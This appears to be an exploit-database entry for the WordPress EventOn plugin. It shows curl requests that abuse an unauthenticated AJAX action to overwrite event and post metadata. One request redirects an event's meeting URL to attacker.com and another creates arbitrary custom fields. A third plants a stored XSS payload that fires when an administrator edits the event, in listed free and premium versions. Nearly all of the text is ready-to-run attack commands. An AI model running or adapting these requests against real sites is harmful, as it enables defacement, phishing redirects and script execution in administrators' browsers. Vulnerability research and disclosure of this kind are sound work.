Share
## https://sploitus.com/exploit?id=WPEX-ID:774655AC-B201-4D9F-8790-9EFF8564BC91
To set the Meeting URL to https://attacker.com/ on the Virtual Event with ID 240:

curl -X POST --data "eid=240&values[_vir_url]=https://attacker.com/" 'https://example.com/wp-admin/admin-ajax.php?action=eventon_eventpost_update_meta'

To set the my_meta metadata (if it does not exist, it will be created as a custom field) to attacker on the post with ID 20:

curl -X POST --data "eid=20&values[my_meta]=attacker" 'https://example.com/wp-admin/admin-ajax.php?action=eventon_eventpost_update_meta'

This can lead to Stored XSS in Free < 2.7.7 and Premium <= 4.5.4

curl -X POST --data 'eid=240&values[_evcal_ec_f1a1_cus]=" style=animation-name:rotation onanimationstart=alert(/XSS/)//' 'https://example.com/wp-admin/admin-ajax.php?action=eventon_eventpost_update_meta'

The XSS will be triggered when an admin will edit the event in the backend